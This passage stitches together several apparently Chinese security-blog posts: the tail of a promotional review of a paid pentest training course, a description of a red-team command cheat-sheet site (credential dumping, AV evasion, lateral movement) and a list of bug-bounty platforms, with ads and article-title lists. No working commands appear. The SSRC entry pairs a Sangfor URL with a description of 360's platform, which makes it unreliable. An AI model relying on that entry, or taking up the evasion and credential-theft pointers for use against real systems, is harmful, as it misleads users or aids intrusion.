，如果你去的话我相信，如果你需要，那么他们老板也会赞助给你（成为学员），毕竟人家也干IDC业务，在武汉云服务器机房都有几个，也不缺你这一个小服务器这是和网盾小羊之前的聊天，也是她离职的前一段时间，我也经常给他们送一点东西，现在她这个号已经还给公司了公司已经给你们试水了，公司是不错的，节假日都有给学员礼物，每两个月都有一次聚餐，喝酒，聊人生，认识五湖四海的人，有业务在国外，或者港澳台的师傅，也有在上海有一家规模不错的公司老板，也有之前欠款100w，现在年入80w的退伍军人，都在网盾来当学员，那么你是不是也能学到很多，比如日后怎么出海，怎么去国外比较方便，国外有哪些好玩的推荐，搞不好你直接去他们公司呢？毕竟这两万可不是一个小数目，还有4个月的吃穿住行，都要3w了，随手能掏出3w的人，对于刚毕业没多久的我们，是一些非常好的人脉，有那么多大佬在一起，你要好好学，这你还担心找不到工作嘛，当然这些也是让我本身出生自农村家庭，还是专科毕业的我开阔了很大的视野，涨了很大的见识，哈哈哈（仅个人观点）他们可能不是最好的线下培训班，但是相对于大部分割韭菜的培训班来说，网盾已经是一个非常不错的线下培训班了，他们是真心对待学员的，在网络安全行业中也是有名的培训机构了，在他们旁边也有两家培训班，隔了一条街，都倒闭了，希望他们能做下去吧。希望师傅们能给网盾多多的支持。线上一起学习四个月的感情可比不上线下认识4个月的一起学习的感情呀，我是在网盾，其他的机构是没有去过，可能更好，但是我没体验过，也不能给师傅们很好的建议，至于之后学的怎么样就要靠自己了，师傅领进门，修行靠个人，投资有风险，想好了再去，前途叫不醒一个装睡的人最后声明，全文仅个人观点，钱难赚，屎难吃，每个人都不容易，能避免的坑就避免，请区分好有人带和报班的区别，每个人家庭条件不一样，对报班的看法也不一样。有的人愿意花三万块买个时间加速器，有的人宁愿用一年自学换一个省钱的结果 —— 没有对错，只有适合与否。可否有优惠？那可以单独咨询我了，我能在他们基础上再给您优惠一点，v：baibaixiaoyu2024

红队命令速查手册 站点：https://book.shentoushi.top/核心作用：这个站点的核心目标是解决红队行动和渗透测试过程中面临的“命令记忆痛点”，充当一个集中化的、快速查询的实战命令速查手册。它将自己定位为安全从业者（尤其是红队成员）的“技术备忘录”和“效率工具”。功能详解：命令的全面整合与分类：站点最显著的功能是将红队渗透中常用的、零散的命令进行了系统性的收集和分类。这涵盖了：操作系统基础命令：明确区分Win命令(Windows) 和Linux命令，这是渗透工作的底层基础。核心安全工具指令：专门整理了wmic,powershell,mimikatz（及其相关变种），metasploit（框架及其常用模块），cobalt strike（及其相关工具）等重量级工具的常用命令和操作语法。掌握这些工具的命令是红队工作的核心技能。专项技术领域命令：隧道代理 (隧道代理工具):整理用于端口转发、代理、内网穿透等场景的工具命令。Web渗透 (Web渗透技巧):包含针对 Web 应用的常见攻击手段和工具命令。内网渗透 (内网渗透):细分为信息收集 (Information)、横向移动 (Win/Linux_LateralMovement)、以及利用impacket工具集进行内网渗透的命令。LOLBins (Lolbin介绍):收集利用 Windows (Win_Lolbin) 和 Linux (Linux_Lolbin) 系统自带合法程序 (Living-off-the-Land Binaries) 进行攻击或绕过检测的技巧与命令组合。凭证提取 (Credential介绍):专门章节讲解如dump_lsass和dump_lsa等关键凭证提取技术的命令和方法。权限提升 (Privilege介绍):整理系统提权 (Privilege_Escalation) 的常用命令和技巧。数据库操作 (数据库命令):覆盖主流数据库 (Mssql,Mysql,Oracle,PostgreSql,Redis) 在渗透中常用的连接、查询、命令执行等语句。编程相关 (编程常用命令):提供Go,Nim,Rust,Python等红队常用开发或利用语言的代码片段或编译命令 (Go,Nim,RustCode,PythonCode)。反病毒规避 (Anti Virus介绍):提供针对常见安全产品（如Kaspersky,Defender,Avast,SangforEDR,Asiainfo,Dbappsecurity,Skylar,HipsTray）的规避技巧或相关命令参考（虽然可能不是直接的绕过命令，但包含相关上下文）。结构清晰，便于速查：网站采用层级目录结构（如“系统命令 > Win命令收集”），逻辑清晰。用户可以根据当前的操作环境（Windows/Linux）、使用的工具（Metasploit/Cobalt Strike）、执行的任务（信息收集/横向移动/提权/凭证窃取）或针对的目标（数据库/特定 AV）快速导航到对应的命令集合。顶部的“手册 (手册)”部分进一步提炼了渗透常用命令，可能是最精华、最高频命令的快速索引。聚焦实战，解决实际问题：其内容直接来源于红队实践中积累的需求。整合系统命令、工具命令、专项技术命令的目的，就是为了让安全工程师在紧张的渗透测试或红队演练中，能快速找到并验证需要执行的命令，避免因记忆模糊或查找资料浪费时间，甚至出错。例如，忘记某个特定的mimikatz参数或一个用于数据库提权的特定 SQL 查询，都可以在这里查找。作为知识库的补充 (Wiki)：关联的 Wiki (https://wiki.shentoushi.top/) 表明该站点可能是一个更广泛知识体系的一部分。主站点 (book.shentoushi.top) 专注于命令速查，而 Wiki 可能承载更深入的技术原理、战术讲解、工具分析或开源项目 (github安全开源项目) 的详细文档。总结：RedTeam And Command(https://book.shentoushi.top) 是一个高度实用主义导向的网站。它不做冗长的理论阐述，而是将红队和渗透测试人员在日常工作中最常需要、最容易遗忘的各种系统命令、工具指令、专项技术操作语句进行了系统化的归类和呈现。它本质上是一个为提升安全工程师操作效率而生的“红队实战命令速查字典”和“专项技术命令手册”，其价值在于让用户能快速定位并准确执行所需的命令，从而更流畅地完成复杂的渗透任务。关联的 Wiki 站点则可能提供更深层次的技术背景支持。往期推荐新版BurpSuite v2025.6.3汉化版，附激活教程挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

src平台推荐，挖SRC必须知道的25个漏洞提交平台 TSrchttps://security.tencent.com/腾讯安全应急响应中心（腾讯SRC）是腾讯用于收集漏洞信息的平台。白帽黑客可提交腾讯产品及服务的漏洞，经审核后，腾讯会依漏洞等级给予提交者奖励，通常有现金和荣誉激励。其目的是借助外部力量提升安全防护，共同守护产品安全，为用户提供健康网络环境。补天https://www.butian.net/补天漏洞响应平台旨在建立企业与白帽子之间的桥梁，帮助企业建立SRC(安全应急响应中心)，让企业更安全，让白帽子获益。360srchttps://security.360.cn/360SRC，360安全应急响应中心，白帽子的提款机。挖洞交票，等级越高赏金越香，上不封顶。别墨迹，干就完了。360众测https://zhongce.360.net/360众测，干就完了！ 这是360自家的高赏金战场，漏洞=现金。58srchttps://security.58.com/58SRC，58同城的漏洞回收站，白帽子进来捡钱。 挖到漏洞甩链接，评级快、打款更快，高危直接秒付。 每月冲榜，前几名额外加码，公开排名，实名装X。 技术够野，钱包就鼓；58SRC，干就完了。DayDayPochttps://www.ddpoc.com/DayDayPoc——白帽子的“军火库”，每日投喂新鲜0day/1day PoC，GitHub日更，关注它，今天不熬夜挖洞，明天熬夜补洞。Seebughttps://www.seebug.org/Seebug，老牌漏洞军火库，PoC/Exp 日更，一键搜索、直接开捅，会员还能提前嫖 0day。洞不等人，上车就射。vivoSrchttps://security.vivo.com.cn/#/rank/listvivoSRC——vivo官方撒钱场，漏洞换赏金，高危立结，上不封顶。每月冲榜，前10直接加钱加戏。别磨叽，干洞就完了。京东srchttps://security.jd.com/#/index京东SRC，东哥的红包局——漏洞=现金，高危秒付，上不封顶；季度冲榜、实物金条、公开封神。技术够硬，钱包就肿，干！华为srchttps://bugbounty.huawei.com/#/home华为SRC，菊厂赏金猎场。技术够野，钱包就鼓；干华为，没废话。国家信息安全漏洞共享平台https://www.cnvd.org.cn/CNVD，国家队漏洞库，官方唯一指定“白名单”通道。 提交原创漏洞=拿编号、上通告、领证书； 党政机关、国央企、关基单位优先收录； 想混国家级荣誉、拿护网加分、评职称，就冲它。 洞不狠别来，来了就名垂“国史”。国家信息安全漏洞库https://www.cnnvd.org.cn/home/childHome想混国家级光环，先把洞磨成刺刀再来。字节跳动srchttps://src.bytedance.com/home字节SRC，宇宙厂撒币现场。技术够骚，钱包就爆；冲字节，别怂。小米srchttps://sec.xiaomi.com/#/小米SRC，雷军的红包雨。技术够刚，直接提车！平安srchttps://security.pingan.com/平安集团的漏洞收集平台，金融行业顶尖的SRC之一。白帽子可提交平安旗下银行、证券、保险等业务系统的漏洞，漏洞评级清晰，奖励丰厚，高危漏洞直接到账，月度榜单前五额外加码，季度榜一送理财金，是金融安全领域的“现金奶牛”。漏洞盒子https://www.vulbox.com/综合性众测平台，覆盖众多行业。漏洞盒子提供丰富的众测项目，从互联网企业到传统行业都有涉及。平台奖励机制灵活，除了现金奖励外，还有积分兑换实物奖品等福利。漏洞盒子注重漏洞的挖掘和修复闭环管理，是白帽子练手和赚取收益的好去处。edusrchttps://src.sjtu.edu.cn/面向教育行业的SRC平台，专注于高校、教育机构的信息安全。白帽子可以提交教育系统、在线学习平台等的漏洞。EduSRC注重安全教育和人才培养，除了奖励机制外，还提供安全培训和交流机会，帮助白帽子提升技术水平，是教育安全领域的“知识宝库”。斗鱼srchttps://security.douyu.com/#/welcome斗鱼直播的安全众测平台，聚焦直播和游戏领域。白帽子可以提交斗鱼直播平台、游戏相关系统的漏洞。斗鱼SRC奖励及时，高危漏洞快速审核和支付。平台还设有季度榜单，上榜者可获得额外奖励和荣誉，是直播行业安全的“守护者”。SSRChttps://security.sangfor.com.cn/360的安全应急响应中心，是网络安全领域的老牌SRC。白帽子可以提交360旗下各类产品的漏洞，包括浏览器、杀毒软件、智能家居等。360SRC以高赏金和快速响应著称，漏洞提交后审核迅速，奖励丰厚。平台还定期举办安全活动，吸引众多白帽子参与，是网络安全的“重镇”。火线安全平台https://www.huoxian.cn/testin火线安全平台是一个新兴的众测平台，专注于互联网和新兴技术领域的漏洞挖掘。平台提供多样化的众测项目，涵盖人工智能、大数据、云计算等领域。火线安全注重技术创新和安全研究，为白帽子提供前沿的技术交流机会和丰厚的奖励，是新兴安全领域的“新星”。百度srchttps://bsrc.baidu.com/views/main/index.html#home百度的安全众测平台，覆盖百度旗下众多产品和服务。白帽子可以提交百度搜索引擎、百度云、百度地图等的漏洞。百度SRC奖励机制完善，高危漏洞直接到账，月度榜单有额外奖励。平台还提供安全技术分享和交流机会，是互联网安全领域的“技术高地”。美团srchttps://security.meituan.com/#/home美团的安全众测平台，聚焦美团外卖、美团点评等业务。白帽子可以提交美团相关系统的漏洞。美团SRC注重漏洞的快速修复和奖励的及时发放，高危漏洞快速审核和支付。平台还设有季度榜单，上榜者可获得额外奖励和荣誉，是生活服务领域安全的“守护者”。荣耀srchttps://security.honor.com/src/#/home荣耀手机的安全众测平台，专注于荣耀手机及相关生态产品的漏洞收集。白帽子可以提交荣耀手机系统、荣耀IoT设备等的漏洞。荣耀SRC奖励丰厚，高危漏洞快速审核和支付，月度榜单有额外奖励。平台还提供与荣耀安全团队直接交流的机会，是智能设备安全的“护盾”。顺丰srchttps://sfsrc.sf-express.com/home顺丰的安全众测平台，聚焦顺丰快递、物流系统等业务。白帽子可以提交顺丰相关系统的漏洞。顺丰SRC注重漏洞的快速修复和奖励的及时发放，高危漏洞快速审核和支付。平台还设有季度榜单，上榜者可获得额外奖励和荣誉，是物流行业安全的“防线”。广告时间-----⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇-----➡➡一个永久的渗透知识库，欢迎您的加入⬅⬅-----⬆⬆⬆⬆⬆⬆⬆⬆⬆⬆⬆⬆⬆-----往期推荐Linux内网渗透（2w字超详细）AD域内网渗透-三种漏洞利用方式【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透一个永久的渗透知识库